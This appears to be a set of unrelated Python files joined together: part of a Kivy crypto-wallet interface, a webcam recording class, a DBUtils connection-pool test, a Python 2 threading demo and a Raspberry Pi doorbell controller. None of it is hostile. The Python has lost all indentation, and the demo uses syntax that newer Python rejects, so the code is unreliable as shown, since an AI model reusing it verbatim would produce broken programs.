Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
new1.py
|
import numpy as np
import cv2
import time
import threading
import wave
from pyaudio import PyAudio, paInt16
from automatedtest.common.tools.logger.logger import logger
from automatedtest.common.tools.logger.utils import Utils
class BaseCamera(object):
def __init__(self):
self._utils = Utils()
self.FrameID = {
'pos_msec': cv2.CAP_PROP_POS_MSEC,
'pos_frames': cv2.CAP_PROP_POS_FRAMES,
'pos_avi_ratio': cv2.CAP_PROP_POS_AVI_RATIO,
'frame_width': cv2.CAP_PROP_FRAME_WIDTH,
'frame_height': cv2.CAP_PROP_FRAME_HEIGHT,
'fps': cv2.CAP_PROP_FPS,
'fourcc': cv2.CAP_PROP_FOURCC,
'frame_count': cv2.CAP_PROP_FRAME_COUNT,
'format': cv2.CAP_PROP_FORMAT,
'mode': cv2.CAP_PROP_MODE,
'brightness': cv2.CAP_PROP_BRIGHTNESS,
'contrast': cv2.CAP_PROP_CONTRAST,
'saturation': cv2.CAP_PROP_SATURATION,
'hue': cv2.CAP_PROP_HUE,
'gain': cv2.CAP_PROP_GAIN,
'exposure': cv2.CAP_PROP_EXPOSURE,
'convert_rgb': cv2.CAP_PROP_CONVERT_RGB,
'white_balance': cv2.CAP_PROP_WHITE_BALANCE_BLUE_U,
'rectification': cv2.CAP_PROP_RECTIFICATION,
'monochrome': cv2.CAP_PROP_MONOCHROME, #
'sharpness': cv2.CAP_PROP_SHARPNESS, #
'auto_exposure': cv2.CAP_PROP_AUTO_EXPOSURE,
'gamma': cv2.CAP_PROP_GAMMA, #
'temperatrue': cv2.CAP_PROP_TEMPERATURE, #
'trigger': cv2.CAP_PROP_TRIGGER, #
'trigger_delay': cv2.CAP_PROP_TRIGGER_DELAY, #
'white_balance_red_v': cv2.CAP_PROP_WHITE_BALANCE_RED_V, #
'zoom': cv2.CAP_PROP_ZOOM, #
'focus': cv2.CAP_PROP_FOCUS, #
'guid': cv2.CAP_PROP_GUID, #
'iso_speed': cv2.CAP_PROP_ISO_SPEED, #
'backlight': cv2.CAP_PROP_BACKLIGHT, #
'pan': cv2.CAP_PROP_PAN, #
'tilt': cv2.CAP_PROP_TILT, #
'roll': cv2.CAP_PROP_ROLL, #
'iris': cv2.CAP_PROP_IRIS, #
'settings': cv2.CAP_PROP_SETTINGS, #
'buffersize': cv2.CAP_PROP_BUFFERSIZE, #
'autofocus': cv2.CAP_PROP_AUTOFOCUS, #
'sar_num': cv2.CAP_PROP_SAR_NUM, #
'sar_den': cv2.CAP_PROP_SAR_DEN, #
'backend': cv2.CAP_PROP_BACKEND, #
'channel': cv2.CAP_PROP_CHANNEL, #
'auto_wb': cv2.CAP_PROP_AUTO_WB, #
'wb_temperatrue': cv2.CAP_PROP_WB_TEMPERATURE #
}
self._mark = {
'mark': True,
'text': ' ',
'x': 10,
'y': 60,
'fontScale': 1,
'R': 0,
'G': 255,
'B': 255,
'thick': 1
}
self._start_time = 0
self._check_time = 0
self.frameCnt = 0
self.fps = 25.0
self.capture = None
self.stopRecord = False
def start_camera(self, camera_id=0, **kwargs):
self._mark = {
'mark': True,
'text': ' ',
'x': 10,
'y': 60,
'fontScale': 1,
'R': 0,
'G': 255,
'B': 255,
'thick': 1
}
self.capture = cv2.VideoCapture(camera_id)
if not self.capture.isOpened():
self.capture.open(camera_id)
if kwargs:
available_params = list(self.FrameID.keys())
set_params = list(kwargs.keys())
for p in set_params:
if p not in available_params:
logger.info("un support camera param: {}={}".format(p, kwargs[p]))
continue
logger.info("setting camera param: {}={}".format(p, kwargs[p]))
self.set_property(p, kwargs[p])
def set_mark(self, **kwargs):
if 'mark' in kwargs:
if str(kwargs['mark']).lower() == 'true':
self._mark['mark'] = True
else:
self._mark['mark'] = False
if 'text' in kwargs and len(str(kwargs['text'])) > 0:
self._mark['text'] = kwargs['text']
else:
if 'logMark' in kwargs:
self._mark['text'] = kwargs['logMark']
else:
self._mark['text'] = ' '
if 'x' in kwargs and 0 <= int(kwargs['x']) <= 640:
self._mark['x'] = int(kwargs['x'])
if 'y' in kwargs and 0 <= int(kwargs['y']) <= 480:
self._mark['y'] = int(kwargs['y'])
if 'fontScale' in kwargs and int(kwargs['fontScale']) > 0:
self._mark['fontScale'] = int(kwargs['fontScale'])
if 'R' in kwargs and 0 <= int(kwargs['R']) <= 255:
self._mark['R'] = int(kwargs['R'])
if 'G' in kwargs and 0 <= int(kwargs['G']) <= 255:
self._mark['G'] = int(kwargs['G'])
if 'B' in kwargs and 0 <= int(kwargs['B']) <= 255:
self._mark['B'] = int(kwargs['B'])
if 'thick' in kwargs and int(kwargs['thick']) > 0:
self._mark['thick'] = int(kwargs['thick'])
if 'logMark' in kwargs:
self._mark['mark'] = True
video_time = int(float(self.frameCnt) / self.fps)
if video_time < 0:
video_time = 0
logger.info(
"Case: <{}> start to run at time: <{}min - {}sec>".format(str(kwargs['logMark']), video_time / 60,
video_time % 60))
def stop_record(self):
self.stopRecord = True
time.sleep(3)
self.stop_camera()
time.sleep(3)
def get_picture_from_record(self, path):
cv2.imwrite(path, self.frame)
return path
def take_picture(self, path):
self._take_frame(path)
return path
def _take_frame(self, name='test.png', gray=False):
try:
name = str(name)
ret, frame = self.capture.read()
if ret:
if gray:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imwrite(name, frame)
else:
logger.error("Camera read frame error.")
return -1
except Exception as e:
logger.error("_take_frame: {}".format(e))
def start_record(self, name='test', total_time=20, fps=20, width=640, height=480, code='MJPG', **kwargs):
try:
self.start_camera(**kwargs)
rec = threading.Thread(target=self.record_video, args=(name, total_time, fps, width, height, code))
rec.setDaemon(False)
rec.start()
except Exception as e:
logger.error("start_record: {}".format(e))
def record_video(self, path, total_time=100, fps=20, width=640, height=480, code='MJPG'):
index = 1
record_time = 20
while True:
datetime = self._utils.get_time_as_string()
tmp = path[:-4] + '_' + str(index) + '_' + datetime + '.avi'
self._record(tmp, fps, record_time, width=width, height=height, code=code)
if index > int(float(total_time) / record_time):
self.stop_camera()
break
index += 1
if self.stopRecord:
break
def _record(self, name='test.avi', fps=20, time_=20, width=640, height=480, code='MJPG'):
try:
name = str(name)
time_ = int(time_)
fps = float(fps)
if fps < 5 or fps > 30:
fps = self.fps
else:
self.fps = fps
code = str(code)
fourcc = cv2.VideoWriter_fourcc(*code)
if code.lower() == 'none':
fourcc = -1
out = cv2.VideoWriter(name, fourcc, fps, (width, height), True)
self._start_time = time.time()
logger.info("Start to record video: <{}> at time: {}".format(name, self._start_time))
self.frameCnt = 0
while self.capture.isOpened():
ret, self.frame = self.capture.read()
if self._mark['mark']:
self._mark['text'] = self._utils.get_time_as_string()
cv2.putText(self.frame, self._mark['text'], (self._mark['x'], self._mark['y']),
cv2.FONT_HERSHEY_SIMPLEX, self._mark['fontScale'],
(self._mark['R'], self._mark['G'], self._mark['B']), self._mark['thick'],
cv2.LINE_AA)
if ret:
out.write(self.frame)
self.frameCnt += 1
self._check_time = time.time()
if int(self._check_time - self._start_time) >= (time_ * 60):
break
if self.stopRecord:
break
out.release()
logger.info("Stop record video: <{}> at time: {}, or {}sec, total frame: {}"
.format(name, self._check_time, int(self._check_time - self._start_time), self.frameCnt))
except Exception as e:
logger.error("_record : {}".format(e))
def camera_test(self, wait=2, **kwargs):
self.start_camera(**kwargs)
start_time = time.time()
while self.capture.isOpened():
ret, frame = self.capture.read()
if ret:
cv2.imshow('f', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
check_time = time.time()
if int(check_time - start_time) >= (wait * 60):
break
cv2.destroyAllWindows()
self.stop_camera()
def set_property(self, property_name, value):
property_name = str(property_name).lower()
if property_name in ('frame_width',
'frame_height',
'fps',
'brightness',
'hue',
'contrast',
'saturation',
'gain',
'exposure',
'white_balance'):
value = float(value)
if property_name in ('frame_width',
'frame_height',
'fps'):
value = int(value)
elif property_name in ('convert_rgb',):
if str(value).lower() == 'true':
value = True
else:
value = False
self.capture.set(self.FrameID[property_name], value)
def reset_property(self):
self.capture.set(self.FrameID['pos_msec'], -1.0)
self.capture.set(self.FrameID['pos_frames'], -1.0)
self.capture.set(self.FrameID['pos_avi_ratio'], -1.0)
self.capture.set(self.FrameID['frame_width'], 640)
self.capture.set(self.FrameID['frame_height'], 480)
self.capture.set(self.FrameID['fps'], 0)
self.capture.set(self.FrameID['fourcc'], -466162819.0)
self.capture.set(self.FrameID['frame_count'], -1.0)
self.capture.set(self.FrameID['format'], -1.0)
self.capture.set(self.FrameID['mode'], -1.0)
self.capture.set(self.FrameID['brightness'], 128.0)
self.capture.set(self.FrameID['contrast'], 32.0)
self.capture.set(self.FrameID['saturation'], 32.0)
self.capture.set(self.FrameID['hue'], 175230088.0)
self.capture.set(self.FrameID['gain'], 131.0)
self.capture.set(self.FrameID['exposure'], -5.0)
self.capture.set(self.FrameID['convert_rgb'], -1.0)
self.capture.set(self.FrameID['white_balance'], 6150.0)
self.capture.set(self.FrameID['rectification'], -1.0)
def get_property(self, property_name=''):
if property_name:
property_name = str(property_name).lower()
return self.capture.get(self.FrameID[property_name])
else:
all_settings = {}
for f in self.FrameID:
all_settings[f] = self.capture.get(self.FrameID[f])
|
test_pooled_pg.py
|
"""Test the PooledPg module.
Note:
We don't test performance here, so the test does not predicate
whether PooledPg actually will help in improving performance or not.
We also assume that the underlying SteadyPg connections are tested.
Copyright and credit info:
* This test was contributed by Christoph Zwerschke
"""
import unittest
from . import mock_pg # noqa
from dbutils.pooled_pg import PooledPg, InvalidConnection
class TestPooledPg(unittest.TestCase):
def test_version(self):
from dbutils import __version__, pooled_pg
self.assertEqual(pooled_pg.__version__, __version__)
self.assertEqual(PooledPg.version, __version__)
def test_create_connection(self):
pool = PooledPg(
1, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 1)
self.assertTrue(hasattr(pool, '_maxusage'))
self.assertIsNone(pool._maxusage)
self.assertTrue(hasattr(pool, '_setsession'))
self.assertIsNone(pool._setsession)
self.assertTrue(hasattr(pool, '_reset'))
self.assertFalse(pool._reset)
db_con = pool._cache.get(0)
pool._cache.put(db_con, 0)
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertTrue(hasattr(db, '_con'))
self.assertEqual(db._con, db_con)
self.assertTrue(hasattr(db, 'query'))
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
self.assertTrue(hasattr(db, '_maxusage'))
self.assertEqual(db._maxusage, 0)
self.assertTrue(hasattr(db, '_setsession_sql'))
self.assertIsNone(db._setsession_sql)
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
db.query('select test')
self.assertEqual(db.num_queries, 1)
pool = PooledPg(1)
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertIsNone(db.dbname)
self.assertTrue(hasattr(db, 'user'))
self.assertIsNone(db.user)
self.assertTrue(hasattr(db, 'num_queries'))
self.assertEqual(db.num_queries, 0)
pool = PooledPg(0, 0, 0, False, 3, ('set datestyle',),)
self.assertEqual(pool._maxusage, 3)
self.assertEqual(pool._setsession, ('set datestyle',))
db = pool.connection()
self.assertEqual(db._maxusage, 3)
self.assertEqual(db._setsession_sql, ('set datestyle',))
def test_close_connection(self):
pool = PooledPg(
0, 1, 0, False, None, None, False,
'PooledPgTestDB', user='PooledPgTestUser')
db = pool.connection()
self.assertTrue(hasattr(db, '_con'))
db_con = db._con
from dbutils.steady_pg import SteadyPgConnection
self.assertTrue(isinstance(db_con, SteadyPgConnection))
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(db.num_queries, 0)
db.query('select test')
self.assertEqual(db.num_queries, 1)
db.close()
self.assertRaises(InvalidConnection, getattr, db, 'num_queries')
db = pool.connection()
self.assertTrue(hasattr(db, 'dbname'))
self.assertEqual(db.dbname, 'PooledPgTestDB')
self.assertTrue(hasattr(db, 'user'))
self.assertEqual(db.user, 'PooledPgTestUser')
self.assertEqual(db.num_queries, 1)
db.query('select test')
self.assertEqual(db.num_queries, 2)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 1)
self.assertEqual(pool._cache.get(0), db_con)
def test_min_max_cached(self):
pool = PooledPg(3)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 6)
pool = PooledPg(3, 4)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(3):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
for i in range(6):
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
for i in range(6):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 4)
pool = PooledPg(3, 2)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(4)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(4):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 3)
pool = PooledPg(2, 5)
self.assertTrue(hasattr(pool, '_cache'))
self.assertEqual(pool._cache.qsize(), 2)
cache = [pool.connection() for i in range(10)]
self.assertEqual(pool._cache.qsize(), 0)
for i in range(10):
cache.pop().close()
self.assertEqual(pool._cache.qsize(), 5)
def test_max_connections(self):
from dbutils.pooled_pg import TooManyConnections
pool = PooledPg(1, 2, 3)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection() for i in range(3)]
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(0, 1, 1, False)
self.assertEqual(pool._blocking, 0)
self.assertEqual(pool._cache.qsize(), 0)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
del db
del cache
pool = PooledPg(1, 2, 1)
self.assertEqual(pool._cache.qsize(), 1)
cache = [pool.connection()]
self.assertEqual(pool._cache.qsize(), 0)
cache.append(pool.connection())
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(3, 2, 1, False)
self.assertEqual(pool._cache.qsize(), 3)
cache = [pool.connection() for i in range(3)]
self.assertEqual(len(cache), 3)
self.assertEqual(pool._cache.qsize(), 0)
self.assertRaises(TooManyConnections, pool.connection)
pool = PooledPg(1, 1, 1, True)
self.assertEqual(pool._blocking, 1)
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
def connection():
pool.connection().query('set thread')
from threading import Thread
thread = Thread(target=connection)
thread.start()
thread.join(0.1)
self.assertTrue(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 0)
session = db._con.session
self.assertEqual(session, [])
del db
thread.join(0.1)
self.assertFalse(thread.is_alive())
self.assertEqual(pool._cache.qsize(), 1)
db = pool.connection()
self.assertEqual(pool._cache.qsize(), 0)
self.assertEqual(session, ['thread'])
del db
def test_one_thread_two_connections(self):
pool = PooledPg(2)
db1 = pool.connection()
for i in range(5):
db1.query('select test')
db2 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
for i in range(7):
db2.query('select test')
self.assertEqual(db1.num_queries, 5)
self.assertEqual(db2.num_queries, 7)
del db1
db1 = pool.connection()
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertTrue(hasattr(db1, 'query'))
for i in range(3):
db1.query('select test')
self.assertEqual(db1.num_queries, 8)
db2.query('select test')
self.assertEqual(db2.num_queries, 8)
def test_three_threads_two_connections(self):
pool = PooledPg(2, 2, 2, True)
try:
from queue import Queue, Empty
except ImportError: # Python 2
from Queue import Queue, Empty
queue = Queue(3)
def connection():
try:
queue.put(pool.connection(), 1, 1)
except TypeError:
queue.put(pool.connection(), 1)
from threading import Thread
for i in range(3):
Thread(target=connection).start()
try:
db1 = queue.get(1, 1)
db2 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
db2 = queue.get(1)
db1_con = db1._con
db2_con = db2._con
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1_con, db2_con)
try:
self.assertRaises(Empty, queue.get, 1, 0.1)
except TypeError:
self.assertRaises(Empty, queue.get, 0)
del db1
try:
db1 = queue.get(1, 1)
except TypeError:
db1 = queue.get(1)
self.assertNotEqual(db1, db2)
self.assertNotEqual(db1._con, db2._con)
self.assertEqual(db1._con, db1_con)
def test_reset_transaction(self):
pool = PooledPg(1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, ['begin', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=1)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['rollback', 'begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(
con.session, ['rollback', 'begin', 'rollback', 'rollback'])
self.assertEqual(con.num_queries, 1)
pool = PooledPg(1, reset=2)
db = pool.connection()
db.begin()
con = db._con
self.assertTrue(con._transaction)
self.assertEqual(con.session, ['begin'])
db.query('select test')
self.assertEqual(con.num_queries, 1)
db.close()
self.assertIs(pool.connection()._con, con)
self.assertFalse(con._transaction)
self.assertEqual(con.session, [])
self.assertEqual(con.num_queries, 0)
if __name__ == '__main__':
unittest.main()
|
main.py
|
import time
import functools
import threading
def async(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
my_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
my_thread.start()
return wrapper
@async
def foo(x,y):
c = 0
while c < 5:
c = c + 1
print '\n',x,y
time.sleep(3)
print '---'
foo(456,789)
foo(123,y=345)
foo(333,y=2)
foo(444,y=1)
foo(990,y=3)
|
Northcliff_Doorbell_Monitor_Gen.py
|
#!/usr/bin/env python3
# Northcliff Doorbell Monitor Version 2.6 GEN
# Requires Home Manager >= V8.5
import RPi.GPIO as GPIO
import time
from datetime import datetime
import subprocess
import http.client
import urllib
import mmap
import requests
from threading import Thread
import paho.mqtt.client as mqtt
import struct
import json
import os
class TwoLedFlash(object): # The class for the LED flashing thread
def __init__(self, cycle_duration, cycle_count):
self.cycle_duration = cycle_duration
self.cycle_count = cycle_count
# Set up the LED GPIO ports
self.auto_led_off = 21
self.manual_led_off = 27
GPIO.setup(self.auto_led_off, GPIO.OUT)
GPIO.setup(self.manual_led_off, GPIO.OUT)
# Turn off both LEDs
GPIO.output(self.manual_led_off, True)
self.manual_led_state = False
GPIO.output(self.auto_led_off, True)
self.auto_led_state = False
self.manual_led_on_count = 10 # LED flashing during startup
self.auto_led_on_count = 10 # LED flashing during startup
self.flash_enable = True # Allows LED flashing to proceed upon startup
self.led_counter = 0 # Reset LED Counter upon startup
def terminate(self): # Stops the LED flashing loop upon shutdown
self.flash_enable = False
def run(self): # The LED flashing method
while self.flash_enable == True: # LED flashing loop continues until shut down
if self.led_counter < self.cycle_count: # led_cycle count sets the number of loops per cycle
if self.led_counter >= self.manual_led_on_count:
GPIO.output(self.manual_led_off, True)
self.manual_led_state = False
else:
GPIO.output(self.manual_led_off, False)
self.manual_led_state = True
if self.led_counter >= self.auto_led_on_count:
GPIO.output(self.auto_led_off, True)
self.auto_led_state = False
else:
GPIO.output(self.auto_led_off, False)
self.auto_led_state = True
self.led_counter += 1
time.sleep(self.cycle_duration) # cycle_duration sets the time increments for the flashing of the LED
else:
self.led_counter = 0
class NorthcliffDoorbellMonitor(object): # The class for the main door monitor program
def __init__(self, pushover_in_manual_mode, full_video, ask_for_auto_time_input, active_auto_start, active_auto_finish, disable_weekend,
manual_mode_call_sip_address, pushover_token, pushover_user, linphone_debug_log_file, auto_message_file,
auto_video_capture_directory, linphone_config_file, auto_on_startup, linphone_in_manual_mode, heartbeat_enabled):
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Set up the non-LED GPIO ports
self.manual_button = 17
self.auto_button = 22
self.door_bell_not_ringing = 24
self.open_door = 18
GPIO.setup(self.door_bell_not_ringing, GPIO.IN)
GPIO.setup(self.open_door, GPIO.OUT)
GPIO.setup(self.manual_button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(self.auto_button, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(self.manual_button, GPIO.RISING, self.process_manual_button, bouncetime=300)
GPIO.add_event_detect(self.auto_button, GPIO.RISING, self.process_auto_button, bouncetime=300)
# Set up status flags
self.idle_mode_enabled = True
self.manual_mode_enabled = False
self.auto_mode_enabled = False
self.triggered = False
self.shutdown = False
self.ringing = False
# Set up pushover and linphone
self.manual_mode_call_sip_address = manual_mode_call_sip_address
self.pushover_token = pushover_token
self.pushover_user = pushover_user
self.linphone_debug_log_file = linphone_debug_log_file
self.auto_message_file = auto_message_file
self.auto_video_capture_directory = auto_video_capture_directory
self.linphone_config_file = linphone_config_file
self.ask_for_auto_time_input = ask_for_auto_time_input
self.pushover_in_manual_mode = pushover_in_manual_mode
self.auto_on_startup = auto_on_startup
self.linphone_in_manual_mode = linphone_in_manual_mode
self.heartbeat_enabled = heartbeat_enabled
if full_video == True:
self.linphone_video_parameter = "V"
print("Full Video Mode")
else:
self.linphone_video_parameter = "C" # Capture-only Video Mode
# Set up auto start and finish times
if self.ask_for_auto_time_input == False:
self.active_auto_start = active_auto_start
self.active_auto_finish = active_auto_finish
self.disable_weekend = disable_weekend
# Set up mqtt comms
self.client = mqtt.Client('doorbell') # Create new instance of mqtt Class
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.connect("<mqtt broker name>", 1883, 60) # Connect to mqtt broker
self.client.loop_start() # Start mqtt monitor thread
self.disable_doorbell_ring_sensor = False # Enable doorbell ring sensor
self.entry_door_open = False
self.heartbeat_count = 0
self.no_heartbeat_ack = False
self.linphone_active = False
def on_connect(self, client, userdata, flags, rc):
time.sleep(1)
self.print_status("Connected to mqtt server with result code "+str(rc)+" on ")
self.client.subscribe('DoorbellButton')
def on_message(self, client, userdata, msg): #Process mqtt messages
decoded_payload = str(msg.payload.decode('utf-8'))
parsed_json = json.loads(decoded_payload)
#print(parsed_json)
if str(msg.topic) == 'DoorbellButton':
if parsed_json['service'] == 'Automatic':
self.process_auto_button(self.auto_button)
elif parsed_json['service'] == 'Manual':
self.process_manual_button(self.manual_button)
elif parsed_json['service'] == 'Open Door':
self.open_and_close_door()
elif parsed_json['service'] == 'Update Status':
self.update_status()
elif parsed_json['service'] == 'Door Status Change':
self.process_door_status_change(parsed_json)
elif parsed_json['service'] == 'Heartbeat Ack':
self.heartbeat_ack()
else:
print('invalid button')
def process_manual_button(self, channel):
self.print_status("Manual Button Pressed on ")
self.triggered = False
self.ringing = False
if self.manual_mode_enabled == False:
self.idle_mode_enabled = False
self.manual_mode_enabled = True
self.auto_mode_enabled = False
